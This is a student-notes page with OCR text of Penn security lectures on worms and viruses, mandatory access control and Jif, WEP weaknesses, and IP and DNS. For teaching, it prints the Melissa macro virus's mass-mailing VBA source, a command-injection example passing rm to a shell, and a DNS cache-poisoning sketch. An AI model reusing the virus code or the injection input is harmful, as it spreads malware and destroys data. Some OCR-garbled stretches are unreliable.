New User Special Price Expires in

Let's log you in.

Sign in with Facebook


Don't have a StudySoup account? Create one here!


Create a StudySoup account

Be part of our community, it's free to join!

Sign up with Facebook


Create your account
By creating an account you agree to StudySoup's terms and conditions and privacy policy

Already have a StudySoup account? Login here


by: Kathleen Cartwright


Kathleen Cartwright
GPA 3.73


Almost Ready


These notes were just uploaded, and will be ready to view shortly.

Purchase these notes here, or revisit this page.

Either way, we'll remind you when they're ready :)

Preview These Notes for FREE

Get a free preview of these Notes, just enter your email below.

Unlock Preview
Unlock Preview

Preview these materials now for free

Why put in your email? Get access to more of this material and other relevant free materials for your school

View Preview

About this Document

Class Notes
25 ?




Popular in Course

Popular in Computer Information Technology

This 234 page Class Notes was uploaded by Kathleen Cartwright on Monday September 28, 2015. The Class Notes belongs to CIS551 at University of Pennsylvania taught by Staff in Fall. Since its upload, it has received 23 views. For similar materials see /class/215374/cis551-university-of-pennsylvania in Computer Information Technology at University of Pennsylvania.

Similar to CIS551 at Penn

Popular in Computer Information Technology




Report this Material


What is Karma?


Karma is the currency of StudySoup.

You can buy or earn more Karma at anytime and redeem it for class notes, study guides, flashcards, and more!

Date Created: 09/28/15
CIS 551 TCOM 401 Computer and Network Security Spring 2010 Lecture 4 Worms In General Selfcontained running programs Unlike viruses although this distinction is mostly academic Infection strategy more active Exploit buffer overflows Exploit bad password choice Defenses Filtering firewalls Monitor system resources Proper access control 21210 ClSTCOM 551 Viruses A computer virus is a malicious program Creates possibly modified copies of itself Attaches to a host program or data Often has other effects deleting files jokes messages Viruses cannot propagate without a host Typically require some user action to activate 21210 CISTCOM 551 VirusWorm Writer s Goals Hard to detect Hard to destroy or deactivate Spreads infection widelyquickly Can reinfect a host Easy to create MachineOS independent 21210 CISTCOM 551 Kinds of Viruses Boot Sector Viruses Historically important but less common today Memory Resident Viruses Standard infected executable Macro Viruses probably most common today Embedded in documents like Word docs Macros are just programs Word processors amp Spreadsheets Startup macro Macros turned on by default Visual Basic Script VBScript 21210 CISTCOM 551 Melissa Macro Virus Implementation VBA Visual Basic for Applications code associated with the quotdocumentopenquot method of Word Strategy Email message containing an infected Word document as an attachment Opening Word document triggers virus if macros are enabled Under certain conditions included attached documents created by the victim 21210 CISTCOM 551 Melissa Macro Virus Behavior Setup lowers the macro security settings permit all macros to run without warning Checks registry for key value by Kwyjibo HKEYCurrentUserSoftwareMicrosoftOfficeMelissa Propagation sends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro 21210 CISTCOM 551 Melissa Macro Virus Behavior Propagation Continued Infects Normaldoc template file Normaldoc is used by all Word documents Joke If minute matches the day of the month the macro inserts message Twentytwo points plus triplewordscore plus fifty points for using all my letters Game39s over I39m outta here 21210 CISTCOM 551 Melissa Virus Source Code Private Sub DocumentOpen On Error Resume Next If SystemPrivateProfileStringquotquot quotHKEYCURRENTUSERSoftwareMicrosoftOffice90WordSecurityquot quotLevequot ltgt Then CommandBarsquotMacroquotControlsquotSecurityquotEnabled False SystemPrivateProfileStringquotquot quotHKEYCURRENTUSERSoftwareMicrosoftOffice90WordSecurityquot quotLevequot 1amp Else CommandBarsquotToolsquotControlsquotMacroquotEnabled False OptionsConfirmConversions 1 1 OptionsVirusProtection 1 1 OptionsSaveNormalPrompt 1 1 End If Dim UngaDasOutlook DasMapiName BreakUmOffASlice Set UngaDasOutlook CreateObjectquotOutlookApplicationquot Set DasMapiName UngaDasOutlookGetNameSpacequotMAPlquot If SystemPrivateProfiIeStringquotquot quotHKEYCURRENTUSERSoftwareMiorosoftOffioequot quotMelissaquot ltgt by Kwyjiboquot Then If UngaDasOutIook quotOutlookquot Then DasMapiNameLogon quotprofilequot quotpasswordquot For y 1 To DasMapiNameAddressListsCount Set AddyBook DasMapiNameAddressListsy x 1 Set BreakUmOffASlice UngaDasOutIookCreateltem0 For 00 1 To AddyBookAddressEntriesCount Peep AddyBookAddressEntriesx BreakUmOffASlioeRecipientsAdd Peep xx1 Ifx gt 50 Then 00 AddyBookAddressEntriesCount Next 00 BreakUmOffASliceSubjeot quotImportant Message From quot amp ApplicationUserName BreakUmOffASliceBody quotHere is that document you asked for don39t show anyone else quot BreakUmOffASIiceAttaohmentsAdd ActiveDooumentFuName BreakUmOffASlioeSend Peep Next y DasMapiNameLogoff End If Morris Worm Infection Sent a small loader to target machine 99 lines of C code It was compiled on the remote platform cross platform compatibility The loader program transferred the rest of the worm from the infected host to the new target Used authentication To prevent sys admins from tampering with loaded code If there was a transmission error the loader would erase its tracks and exit 21210 CISTCOM 551 11 Morris Worm StealthDOS When loader obtained full code It put into main memory and encrypted Original copies were deleted from disk Even memory dump wouldn t expose worm Worm periodically changed its name and process ID Resource exhaustion Denial of service There was a bug in the loader program that caused many copies of the worm to be spawned per host System administrators cut their network connections Couldn t use internet to exchange fixes 21210 CISTCOM 551 12 Code Red Worm July 2001 Exploited buffer overflow vulnerability in IIS Indexing Service DLL Attack Sequence The victim host is scanned for TCP port 80 The attacking host sends the exploit string to the victim The worm now executing on the victim host checks for the existence of cnotworm If found the worm ceases execution If cnotworm is not found the worm begins spawning threads to scan random IP addresses for hosts listening on TCP port 80 exploiting any vulnerable hosts it finds If the victim host39s default language is English then after 100 scanning threads have started and a certain period of time has elapsed following infection all web pages served by the victim host are defaced with the message Hacked by Chinese 21210 CISTCOM 551 Code Red Analysis httpwwwcaidaorgreseachsecuritycodered httpwwwcaidaorgresearchsecuritycoderednewframes smallloggif In less than 14 hours 359104 hosts were compromised Doubled population in 37 minutes on average Attempted to launch a Denial of Service DoS attack against www1whitehousegov Attacked the IP address of the server rather than the domain name Checked to make sure that port 80 was active before launching the denial of service phase of the attack These features made it trivially easy to disable the Denial of Service phase 2 portion of the attack We cannot expect such weaknesses in the design of future attacks 21210 CISTCOM 551 14 Ooam mma ltlto5 m 58 38 55 om cm 86228 0 303 3838 3 Sm 9898 2 5m 6953 misc 3 m 6o 2mm Qm mczEmwzzZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZ ucmomo ucmmmm ucovam ucumo ucmomogcmmmm ucovam u came ucmomo ucmmmm ucovamgcumo ucmomo ucmomo ucm mo ucooom ucooom ucmvoo ucmm a cmmm ucooum ucoooo ucoonm gtQqomlt 555 368 0 303 3833 62 cm qmd momq lt55 6 6953 3386 ImEIO ltltm003m 8 zbnltltltltltltltltoq383 Imoxmq wlt 0389 MEMEO OmOOlt mm 4m Slammer Worm Saturday 25 Jan 2003 around 0530 UTC Exploited buffer overflow in Microsoft39s SQL Server or MS SQL Desktop Engine MSDE Port 1434 not a very commonly used port Infected gt 75000 hosts likely more Less than 10 minutes Reached peak scanning rate 55 million scanssec in 3 minutes No malicious payload Used a single UDP packet with buffer overflow code injection to spread Bugs in the Slammer code slowed its growth The author made mistakes in the random number generator 21210 ClSTCOM 551 16 More recently W32Confickerworm aka Downadup Exploits a logic error in Microsoft Windows Server Service Several strains ConfickerA ConfickerB etc httpwwwmicrosoftcomtechnetsecurityBulletinMSO8 OG7mspx Behavior Worm copies itself using a random name to the Sysdir folder Connects to public websites to obtain the public IP address of the affected computer Attempts to download a malware file from the remote website Starts a HTTP server on a random port on the infected machine to host a copy of the worm Continuously scans the subnet of the infected host for vulnerable machines and executes the exploit If the exploit is successful the remote computer will then connect back to the http server and download a copy of the worm Uses a combination of attacks Brute force password guessing spread on USB sticks 21210 CISTCOM 551 17 Internet Worm Trends Code Red Code Red ll Nimda TOP 80 Win 8 Code Red infected more than 350000 on July 19 2001 by several hours Uniformly scans the entire IPv4 space Code Red ll local scan Nimda multiple ways SQL Slammer UDP 1434 SQL server Infected more than 75000 on Jan 25 2003 Infected 90 of vulnerable hosts in 10 minutes Blaster TOP 135 Vl n RPC Sequential scan infected 300000 to more than 1 million hosts on August 11 2003 Conficker Win RPC other infects 11 million PCs in lt 24 hours As of Jan 19 2008 it had infected nearly 9 million hosts 21210 CISTCOM 551 18 But it gets worse Flash Worms Paper quotThe Top Speed of Flash Worms Idea Don39t do random search Instead partition the search space among instances of the worm Permutation scanning Or keep a tailored quothit listquot of vulnerable hosts and distribute this initial set to the first worms spawned Simulations suggest that such a worm could saturate 95 of 1000000 vulnerable hosts on the Internet in 510 milliseconds Using UDP For TCP it would take 13 seconds 21210 CISTCOM 551 19 Analysis Random Constant Spread Model IP address space 232 N size of the total vulnerable population St susceptiblenoninfected hosts at time t lt infectiveinfected hosts at timet 3 Contact likelihood St StN proportion of susceptible population it ltN proportion of infected population Note St lt N 21210 CISTCOM 551 20 Infection rate over time Change in infection rate is expressed as dl a W 3 13 of infected hosts rate of contact ke39lhOOd that contacted hosts is susceptible Rewrite to obtain Integrate to get this closed form 3tT dl 39t139t e E 3 K quot0 1e3tT T integration constant 21210 CISTCOM 551 21 Exponential growth tapers off Example curve of t which is it N Here N 35 x 105 3 affects steepness of slope 5 X10 357 3 la 257 2 157 1 05 Oo 10o 200 3oo 4oo 5oo 600 t secs 21210 CISTCOM 551 22 What about the constants N estimated of hosts running vulnerable software eg Apache or mail servers In 2002 there were roughly 126M web servers on the internet Reasonable choice for 5 is r N 232 Where r probing rate per time unit For Code Red 3 was empirically measured at about 18 hostshour T was empirically measured at about 119 time at which half the vunerable hosts were infected Code Red l was programmed to shut itself off at midnight UTC on July 19th But incorrectly set clocks allowed it to live until August Second outbreak had 3 of approximately 07 hostshour lmplies that about 12 of the vulnerable hosts had been patched 21210 CISTCOM 551 23 Predictions vs Reality Port 80 scans due to Code Red 250000 200000 150000 100000 Number seen In an hour 50000 0 0 courtesy Paxson Slaniford eaver 2 4 6 510121415 Houroflheday 1a 20 01 scans Preaicled it of scans 21210 C STCOM 551 What can be done Reduce the number of infected hosts Treatment reduce t while t is still small eg shut downrepair infected hosts Reduce the contact rate Containment reduce rs while t is still small eg filter traffic Reactive Reduce the number of susceptible hosts Prevention reduce 80 Proactive eg use typesafe languages 21210 CISTCOM 551 25 Treatment Reduce of infected hosts Disinfect infected hosts Detect infection in realtime Develop specialized vaccine in realtime Distribute patch more quickly than worm can spread Antiworm CRCIean Bandwidth interference 21210 CISTCOM 551 26 Effects f quotatohinquot infeote hsts KermaokMoKendriok Model State transition susceptibl Ut it of removed from infectious population y removal rate di du 1 39 39 H 3 Kt 140 H j BNm du H y it 4 I t 2 0 1 O 10 20 3O 40 21210 CISTCOM 551 t 27 CIS 551 TCOM 401 Computer and Network Security Spring 2009 Lecture 12 Announcements Plan for Today Access Control Discretionary vs Mandatory access control Software validation Project 2 reminder Due Friday March 6th right before Spring Break 22609 CISTCOM 551 Access Control Discretionary The individual user may at his own discretion determine who is authorized to access the objects he creates Mandatory The creator of an object does not necessarily have the ability to determine who has authorized access to it Typically policy is governed by some central authority The policy on an object in the system depends on what object information was used to create the object 22609 CISTCOM 551 3 BellLaPadula Confidentiality Model No read up no write down Subject are assi ned clearance levels drawn from the lattI e o securI y abels CS quotclearance of the subject Squot A principal may read objects with lower or equal security label Read CO s CS A principal may write objects with higher or equal security label Write CS s CO Example A user with Secret clearance can Read objects with label Public and Secret Writecreate objects with label Secret 22609 CISTCOM 551 4 Picture Confidentiality Read below write above 22609 CISTCOM 551 Picture Integrity Read below write above 22609 CISTCOM 551 Multilevel Security Policies In general security levels form a quotjoin semilatticequot There is an ordering s on security levels For any pair of labels L1 and L2 there is an quotjoinquot operation L1 6 L2 is a label in the lattice such that 1 L1 s L1 Gr L2 and L2 s L1 6 L2 quotupper boundquot 2 If L1 s L3 and L2 s L3 then L1 Gr L2 s L3 quotleast boundquot For example Public 6 Secret Secret Labeling rules Classification is a function C Object a Lattice If some object O is quotcreated fromquot objects 01 On then CO C01 Gr Gr COn 22609 CISTCOM 551 Implementing Multilevel Security Dynamic Tag all values in memory with their security level Operations propagate security levels Must be sure that tags can t be modified Expensive and approximate Classic result Informationflow policies cannot be enforced purely by a reference monitor Problem arises from implicit flows Static Program analysis May be more precise May have less overhead 22609 ClSTCOM 551 Perl39s Solution for Integrity The problem need to track the source of data Examples Format string SQL injection etc arg shift system quotecho argquot Give this program the argument quot rm quot Per offers a taint checking mode Tracks the source of data trusted vs tainted Ensure that tainted data is not used in system calls Tainted data can be converted to trusted data by pattern matching Doesn39t check implicit flows 22609 CISTCOM 551 9 httpwwwnsagovselinux SELinux Securityenhanced Linux system NSA Enforce separation of information based on confidentiality and integrity requirements Mandatory access control incorporated into the major subsystems of the kernel Limit tampering and bypassing of application security mechanisms Confine damage caused by malicious applications Type enforcement Each process has an associated domain Each object has an associated type label Configuration files specify How domains are allowed to access types Allowable interactions and transitions between domains Rolebased access control Each process has an associated role Separate system and user processes Configuration files specify Set of domains that may be entered by each role 22609 CISTCOM 551 10 Information Flows through Software Explicit Flows intSecret X f intPuinc Y O YX Implicit Flows intSecret X f intPuinc Y O intPuinc Z O intPuinC W 0 if X gt Othen Y1 ebe Z1 W3 22609 CISTCOM 551 Jif Javalnformation Flow Myers Chong Nystrom Zdancewic Zheng httpwwwcscorneedujif Policy Language that extends Java s type system Confidentiality amp Integrity constraints Principal hierarchy delegation Robust Declassification Jif is intended to enforce noninterference lntuitively requires that high security data not affect any behavior of the program that is visible to low clearance users 12 Decentralized Label Model Myers amp Liskov 3997 3900 Principals users groups etc Express constraints on data usage Distinct from hosts Alice Bob etc are principals Labels bottom label fewest constraints Alice Bob readany by Alice and Bob Alice Bob Charles Bob Charles readable by Charles AliceBob T AliceBob BobAlice BobAlice Alice Bob 13 Jif Policy Annotations Augment Java types with labels intAice a in Bobj b intAiceBob c Give appropriate types to lO routines void Networksendint x Typechecking detects illegal flows ab Networksenda cam 14 Security Policies in Jif Confidentiality labels intAlice a quota is Alice39s private intquot Integrity labels intAlice a quotAlice must trust aquot Compound labels intAlice Alice a Both constraints Insecure Secure intAlice a1 a2 a1 b 31 32 intBob b b a1 15 Richer Security Policies More complex policies quotAlice will release her data to Bob but only after he has paid her 10quot Declassification Escape from strict noninterference Like cast in C it s dangerous Bound its effects Jif uses the notion of authority Program runs on behalf of set of principals Classes and methods can declare authority requirements 16 Declassification intAice a int Paid compute Paid if Paid10 intBob b declassifya to Bob quottypecastquot intAice to in Bobj 17 Example Oblivious Transfer Rabin 3981 Alice39s Policy quotBob gets to choose exactly one of m1 and m2quot Bob39s Policy quotAlice doesn39t get to know which item request Classic Result quotImpossible to solve using 2 principals with perfect securityquot Damg rd Kilian Slavail 3999 18 Oblivious Transfer Java int m1 m2 boo1ean accessed int n ans n chooseC if laccessed accessed true if n 1 ans m1 e1se ans m2 A11ce39s data Bob39s data Bob39s choice Transfer 19 Adding Confidentiality Labels inlie 39 m1 m2 Aiice39s data booiean accessed in n ans Bob39s data n chooseC Bob39s choice if laccessed Transfer accessed true if n 1 1 ans mli Vb ca on e se ans m2 Fans 20 Using Declassification intAiice m1 m2 Aiice39s data booiean accessed intBob n ans Bob39s data n choose Verification 5 choice Fails if laccessed Transfer accessed true if n 1 ans eise ans 21 Integrity Constraints intAiicei m1 m2 Aiice39s data booiean accessed intBob n ans Bob39s data n chooseC Rnh39s rhoice Verification if laccessed FaHS accessed true if n 1 ans deciassifyle to Bob eise ans deciassifyCmZ to Bob 22 Using Endorsement intA11ce m1 m2 A11ce39s data boo1eanA11ce accessed intBob n ans Bob39s data n chooseC Bob39s choice if laccessed Transfer accessed true39 if c w aA 1 ans dec1assifym1 to Bob e1se ans dec1assifym2 to Bob 23 Two Other MAC Policies quotChinese Wallquot policy Brewer amp Nash 3989 Object labels are classified into quotconflict classesquot lf subject accesses one object with label L1 in a conflict class all access to objects labeled with other labels in the conflict class are denied Policy changes dynamically quotSeparation of Dutiesquot Division of responsibilities among subjects Example Bank auditor cannot issue checks 22609 CISTCOM 551 24 Covert Channels amp Information Hiding A covert channel is a means by which two components of a system that are not permitted to communicate do so anyway by affecting a shared resource Information hiding Two components of the system that are permitted to communicate about one set of things exchange information about disallowed topics by encoding contraband information in the legitimate traffic Not that hard to leak a small amount of data A 64 bit encryption key is not that hard to transmit Even possible to encode relatively large amounts of data Example channels information hiding strategies Program behavior Adjust the formatting of output use the t character for 1 and 8 spaces for 0 Vary timing behavior based on key Use quotlow orderquot bits to send signals Power consumption Grabbingreleasing a lock on a shared resource 22609 CISTCOM 551 25 Differential Power Analysis Read the value of a DES password off of a smartcard by watching power consumption 3425 E 40 m M l M l 39 l l I M Q35I r 1 l In 1 1 7quot willle limit it ill I39m illMilly illll llllll39lll TImaimsf This figure shows simple power analysis of DES encryption The 16 rounds are clearly visible 22609 CISTCOM 551 26 TEMPEST Security Transient Electromagnetic Pulse Emanation Standard Or Temporary Emanation and Spurious Transmission Emission security Van Eck phreaking computer monitors and other devices give off electromagnetic radiation V th the right antenna and receiver these emanations can be intercepted from a remote location and then be redisplayed in the case of a monitor screen or recorded and replayed such as with a printer or keyboard Policy is set in National Communications Security Committee Directive 4 Guidelines for preventing EM reception Shield the device expensive Shield a location inconvenient 22609 CISTCOM 551 27 Defenses for Covert Channels Well specified security policies at the human level Auditing mechanisms at the human level Justify prosecution if the attacker is caught Code review This is a form of audit Automated program analysis Type systems that let programmers specify confidentiality labels Transform programs so that both branches of a conditional statement take the same amount of time Disallow branches on quotsecretquot information Automated system analysis Monitor http traffic to look for unusual behavior 22609 CISTCOM 551 28 Specific Countermeasures Against timing attacks Make all operations run in same amount of time Hard to implement Can t design platformindependent algorithms All operations take as long as slowest one Add random delays Can take more samples to remove randomness Against power analysis attacks Make all operations take the same amount of power Again hard to implement Add randomness 22609 CISTCOM 551 29 Question Suppose you have gone through the costbenefit and risk analysis to determine the securty requirements for a computer system How do you know whether a system meets its security requirements Class answers 22609 CISTCOM 551 30 Assurance methods Testing Regression testing automation tools etc Can demonstrate existence of flaw not absence Validation Requirements checking Design and code reviews Sit around table drink lots of coffee Module and system testing Formal verification Develop a rigorous mathematical specification of the system Prove using tools or by hand that the implementation meets the specification Timeconsuming painstaking process Has been done for some systems See wwwpraxis hiscom 22609 CISTCOM 551 31 Rainbow Series DoD Trusted Computer Sys Evaluation Criteria Orange Book Audit in Trusted Systems Tan Book Configuration Management in Trusted Systems Amber Book Trusted Distribution in Trusted Systems Dark Lavender Book Security Modeling in Trusted Systems Aqua Book Formal Verification Systems Purple Book Covert Channel Analysis of Trusted Systems Light Pink Book many more httpwwwfasorgirpnsarainbowhtm 22609 CISTCOM 551 32 Orange Book Requirements TCSEC TCSEC Trusted Computer System Evaluation Criteria Security Policy Accountability Assurance Documentation Next few slides details not important Main point Higher levels require more work documentation and configuration management are part of the criteria 22609 CISTCOM 551 33 Common Criteria Three parts CC Documents Protection profiles requirements for category of systems Functional requirements Assurance requirements CC Evaluation Methodology National Schemes local ways of doing evaluation Endorsed by 14 countries Replaces TCSEC CC adopted 1998 Last TCSEC evaluation completed 2000 httpwwwniapccevsorgccscheme httpwwwcommoncriteriaportalorg 22609 CISTCOM 551 34 Protection Profiles Requirements for categories of systems Subject to review and certified Example Controlled Access PP CAPPV1d Security functional requirements Authentication User Data Protection Prevent Audit Loss Security assurance requirements Security testing Admin guidance Lifecycle support Assumes nonhostile and wellmanaged users Does not consider malicious system developers 22609 CISTCOM 551 35 Evaluation Assurance Levels 1 4 EAL 1 Functionally Tested Review of functional and interface specifications Some independent testing EAL 2 Structu rally Tested Analysis of security functions including highlevel design Independent testing review of developer testing EAL 3 Methodically Tested and Checked Development environment controls configuration mgmt EAL 4 Methodically Designed Tested Reviewed Informal spec of security policy Independent testing 22609 CISTCOM 551 36 Evaluation Assurance Levels 5 7 EAL 5 Semiformally Designed and Tested Formal model modular design Vulnerability search covert channel analysis EAL 6 Semiformally Verified Design and Tested Structured development process EAL 7 Formally Verified Design and Tested Formal presentation of functional specification Product or system design must be simple Independent confirmation of developer tests 22609 CISTCOM 551 37 Example Windows 2000 EAL 4 Evaluation performed by SAIC Used Controlled Access Protection Profile Level EAL 4 Flaw Remediation EAL 4 represents the highest level at which products not built specifically to meet the requirements of EAL 57 ought to be evaluated EAL 57 requires more stringent design and development procedures Flaw Remediation Evaluation based on specific configurations Produced configuration guide that may be useful 22609 ClSTCOM 551 38 m xuimml Infurnmlinn Murmur Furlurrslliu Micrusofl Corporation Ilwll m u lnlurmlnrllnunuII Hl1mulc1wIh um m and mmw 4v lhr pmduu m m mm um gmm I hc mdml mummy 4nd 1 mmm m Ind m m an Wm m L mum pplmwnh mum u um uxvmm m 1 mm hm hm mmlunul m 1h umluumu quotrum Wm Minmm m m mnmm mm mm m nmr M Ma 1 my mn unnl mvmlwwmum luncmmvm and Iquot mum mum h um mm H pnum munm uvrmkkwu mm m Implied 39 nl ms II In mm v s m xiv m Wm Wu mm Wumm u w m nmkumwn MW WWW m WM aw m w WWmmmmm mm mm m a mm x m w p A 3quot Wk 99 mm m WWW WWW I M m M mm M mm m m u 4 mm n Mum lhmlw nmmnwmx unn 22609 C STCOM 551 CIS 551 TCOM 401 Computer and Network Security Spring 2009 Lecture 7 Announcements First project Due TOMORROW at 1159 pm httpwwwcisupenneducis551proiect1html Plan for Today Networks 80211 PTCP 21209 CISTCOM 551 Wireless 80211 Spread spectrum radio 24GHz frequency band Bandwidth ranges 1 2 55 1122 Mbps Like Ethernet 80211 has shared medium Need MAC uses exponential backoff Unlike Ethernet in 80211 No support for collision detection Not all senders and receivers are directly connected 21209 CISTCOM 551 Hidden nodes A and C are hidden with respect to each other Frames sent from A to B and C to B simultaneously may collide but A and C can t detect the collision 21209 CISTCOM 551 Exposed nodes B is exposed to C Suppose B is sending to A C should still be allowed to transmit to D Even though C B transmission would collide Note A to B transmission would cause collision 21209 CISTCOM 551 Multiple Access Collision Avoidance Sender transmits Request To Send RTS Includes length of data to be transmitted Timeout leads to exponential backoff like Ethernet Receiver replies with Clear To Send CTS Echoes the length field Receiver sends ACK of frame to sender Any node that sees CTS cannot transmit for durations specified by length Any node that sees RTS but not CTS is not close enough to the receiver to interfere It s free to transmit 21209 CISTCOM 551 Wireless Access Points Distribution Syste A V Distribution System wired network infrastructure Access points stationary wireless device Roaming wireless 21209 CISTCOM 551 Selecting an Access Point Active scanning Node sends a Probe frame All AP s within reach reply with a Probe Response frame Node selects an AP and sends Association Request frame AP replies with Association Response frame Passive scanning AP periodically broadcasts Beacon frame Node sends Association Request 21209 CISTCOM 551 Node Mobility Distribution Syste A V B moves from AP1 to AP2 B sends Probes eventually prefers AP2 to AP1 Sends Association Request 21209 CISTCOM 551 80211 Security Issues Packet Sniffing is worse No physical connection needed Long range 6 blocks Current encryption standards WEP WEP2 not that good Denial of service Association and Disassociation Requests are not authenticated 21209 CISTCOM 551 10 Wired Equivalent Privacy WEP Designed to provide same security standards as wired LANs like Ethernet WEP uses 40 bit keys WEP2 uses 128 bit keys Uses shared key authentication Key is configured manually at the access point Key is configured manually at the wireless device WEP frame transmission format 80211Hdr IV KSIVDATA ICV S shared key IV 24 bit quotinitialization vectorquot ICV quotintegrity checksumquot uses the CRC checksum algorithm Encryption algorithm is RC4 21209 ClSTCOM 551 11 Problem with WEP RC4 generates a keystream Shared key 8 plus IV generates a long sequence of pseudorandom bytes RC4IVS Encryption is C P G RC4IVS G quotxorquot IV39s are public so it39s easy to detect their reuse Problem if IV ever repeats then we have C1 P1 6 RC4IVS CZ P2 6 RC4IVS SoC1 CZP1 P2 Statistical analysis or known plaintext can disentangle P1 and P2 21209 CISTCOM 551 12 Finding IV Collisions How IV is picked is not specified in the standard Standard quotrecommendsquot but does not require that IV be changed for every packet Some vendors initialize to O on reset and then increment Some vendors generate IV randomly per packet Very active links send 1000 packetssec Exhaust 24 bit keyspace in lt 12 day If IV is chosen randomly probability is gt 50 that there will be a collision after only 4823 packets 21209 CISTCOM 551 13 Other WEP problems Replay attacks Standard requires the protocol to be stateless Expensive to rule out replay attacks The sender and receiver can39t keep track of expected sequence numbers Integrity violations Attacker can inject or corrupt WEP encrypted packets CRC Cyclic Redundancy Check is an error detection code commonly used in internet protocols CRC is good at detecting random errors introduced by environmental noise But CRC is not a hash function it is easy to find collisions Attacker can arbitrarily pass off bogus WEP packets as legitimate ones 21209 CISTCOM 551 14 Newer 80211 Standards WPA WiFi Protected Access Introduced in 80111i Uses much stronger cryptography AES EAP Extensible Authentication Protocol Negotiates an authentication mechanism We will talk about such cryptographic protocols in much more detail in a few weeks 21209 CISTCOM 551 15 Internet Protocol Interoperability Overlays running at hosts Virtual Network Infrastructure runs globally Networks run locally 21209 CISTCOM 551 16 Internetworks Router Gateway 21209 CISTCOM 551 17 Internetworks Ethernet Ethernet Pointto Point Link eg ISDN FDDI Token Ring 21209 CISTCOM 551 18 lP Encapsulation Example of protocol layers used to transmit from H1 to H8 in network shown on previous slide H1 H8 TOP R1 R2 R3 TOP ETH ETHFDDI FDDIPPP PPPETH ETH I I I I I l I l I l 21209 CISTCOM 551 lP Service Model Choose minimal service model All nets can implement Tin cans and a string extremum Features Besteffort datagram delivery Reliability etc as overlays as in TCPIP Packet format standardized 21209 CISTCOM 551 20 IPv4 Packet Format O 4 8 1619 31 Length Offset Protocol Checksum SourceAddr DestinationAddr Options variable length 21209 CISTCOM 551 Fields of IPv4 Header Version Version of IP example header is IPv4 First field so easy to implement case statement Hlen Header length in 32bit words TOS Type of Service rarely used Priorities delay throughput reliability Length Length of datagram in bytes 16 bits hence max of 65536 bytes Fields for fragmentation and reassembly Identifier Flags Offset 21209 CISTCOM 551 22 Header fields continued TTL Time to live in reality hop count 64 is the current default 128 also used Protocol eg TOP 6 UDP17 etc Checksum Checksum of header not CRC If header fails checksum discard the whole packet SourceAddr DestinationAddr 32 bit IP addresses global lPdefined Options length can be computed using Hlen 21209 CISTCOM 551 23 lP Datagram Delivery Every IP packet datagram contains the destination IP address The network part of the address uniquely identifies a single network that is part of the larger Internet All hosts and routers that share the same network part of their address are connected to the same physical network Routers can exchange packets on any network they re attached to 21209 CISTCOM 551 24 IP addresses Hierarchical not flat as in Ethernet 7 24 0 Network Host A 14 16 1 0 Network Host B 21 8 1 1 0 Network Host C Written as four decimal numbers separated by dots 158130142 21209 CISTCOM 551 25 Network Classes Class of nets of hosts pernet A 126 16 million B 8192 65534 C 2 million 254 21209 CISTCOM 551 26 lP Forwarding algorithm f Network dest Network interface then deliver to destination over interface else if Network dest in forwarding table deliver packet to NextHop router else deliver packet to default router FonNarding tables Contain Network NextHop pairs Additional information Built by routing protocol that learns the network topology adapts to changes 21209 CISTCOM 551 27 Subnetting Problem IP addressing scheme leads to fragmentation A class B network with only 300 machines on it wastes gt 65000 addresses Need a way to divide up a single network address space into multiple smaller subnetworks ldea One IP network number allocated to several physical networks The multiple physical networks are called subnets Should be close together why Useful when a large company or university has many physical networks 21209 CISTCOM 551 28 Subnet Numbers Solution Subnetting All nodes are configured with subnet mask Allows definition of a subnet number All hosts on a physical subnetwork share the same subnet number Subnet Mask 2552552550 111111111111111111111111 oooooooo Subnetted Address Network number Subnet ID Host ID 21209 CISTCOM 551 29 Example of Subnetting Subnet mask 255255255128 Subnet 12896340 12896341 128963415 1289534130 Subnet mask 255255255128 Subnet 1289634128 1289634129 1289634139 12896331 Subnet mask 2552552550 Subnet 12896330 128963314 21209 CISTCOM 551 30 Subnets continued Mask is bitwiseANDed with address This is done at routers Router tables in this model ltSubnet Subnet Mask NextHopgt Subnetting allows a set of physical networks to look like a single logical network from elsewhere 21209 CISTCOM 551 31 Forwarding Algorithm D destination IP address for each forwarding table entry SubnetNumber SubnetMask NextHop D1 SubnetMask amp D if D1 SubnetNumber if NextHop is an interface deliver datagram directly to destination ese deliver datagram to NextHop router Deliver datagram to default router if above fails 21209 CISTCOM 551 32 ARP Address Resolution Protocol Problem Need mapping between IP and link layer addresses Solution ARP Every host maintains lP Link layer mapping table cache Timeout associated with cached info 15 min Sender Broadcasts Who is IP addr X Broadcast message includes sender s lP amp Link Layer address Receivers Any host with sender in cache refreshes timeout Host with IP address X replies IP X is Link Layer Y Target host adds sender if not already in cache 21209 CISTCOM 551 33 ICMP Internet Control Message Protocol Collection of error amp control messages Sent back to the source when Router or Host cannot process packet correctly Error Examples Destination host unreachable Reassembly process failed TTL reached 0 IP Header Checksum failed Control Example Redirect tells source about a better route 21209 CISTCOM 551 34 Domain Name System System for mapping mnemonic names for computers into IP addresses zetacisupennedu gt 15813012244 Domain Hierarchy Name Servers 13 Root servers map toplevel domains such as quotcomquot or quotnetquot Why 13 Early UDP protocol supported only 512 bytes Name Resolution Protocol for looking up hierarchical domain names to determine the IP address Protocol runs on UDP port 53 21209 CISTCOM 551 35 Domain Name Hierarchy edu MN con1 net corneH d5 AAA g mi rg upenn 7 dscouyahoo nasansf arpanavy u seas whanon Hierarchy of Name Servers Root Name Server Cornell Name Server Upenn Name Server N CIS Name Server SEAS Name Server Wharton Name Server 21209 CISTCOM 551 37 Records on Name Servers lt Name Type Class TTL RDLength RDATA gt Name of the node Types A Host to address mappings NS Name server address mappings CNAME Aliases MX Mail exchange server mappings others Class IN for IP addresses 21209 CISTCOM 551 38 Name resolution Root Name server 1984104 AM Z39 75gtAj W Local wwwupennedu edu Name Name 4m 204741121 upenn Name server 207142131234 21209 CISTCOM 551 39 DNS Vulnerabilities See quotCorrupted DNS Resolution Paths The rise of a malicious resolution authority by Dagon et al Rogue DNS Servers Compromised DNS servers that answer incorrectly DNS Cache Poisoning Request subdomainexamplecom IN A Repw Answer no response Authority section examplecom 3600 IN nswikipediaorg Additional section nswikipediaorg IN A wxyz 21209 CISTCOM 551 40 Reflected denial of service ICMP message with an 